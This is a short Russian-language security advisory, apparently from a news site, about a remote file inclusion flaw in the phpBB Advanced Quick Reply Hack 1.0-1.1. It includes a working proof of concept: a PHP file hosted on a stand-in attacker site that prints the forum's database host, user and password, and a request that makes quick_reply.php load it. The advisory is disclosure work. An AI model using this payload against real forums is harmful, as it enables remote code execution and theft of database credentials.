Уязвимость, обнаруженная в phpBB Advanced Quick Reply Hack, позволяет удаленному атакующему
изменить путь к extension.inc в сценарии quick_reply.php. В результате, атакующий может внедрить произвольный PHP сценарий из своего источника, который может использоваться для выполнения произвольных команд на Web сервере.

Пример: 

Создаем сценарий 'extension.inc' на удаленном сервере: 

<?php 
include('config'.'.php'); 
echo "DB Type: $dbms <br>"; 
echo "DB Host: $dbhost <br>"; 
echo "DB Name: $dbname <br>"; 
echo "DB User: $dbuser <br>"; 
echo "DB Pass: $dbpasswd <br>"; 
exit; 
?>
 

Затем запрос: 

http://www.example.com/quick_reply.php? phpbb_root_path=http://attackersite.tld/&mode=smilies 

Он раскроет содержание базы данных форума. 

Уязвимость обнаружена в RustyDragon phpBB Advanced Quick Reply Hack 1.0-1.1 (phpBB 2.0-2.0.3).

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии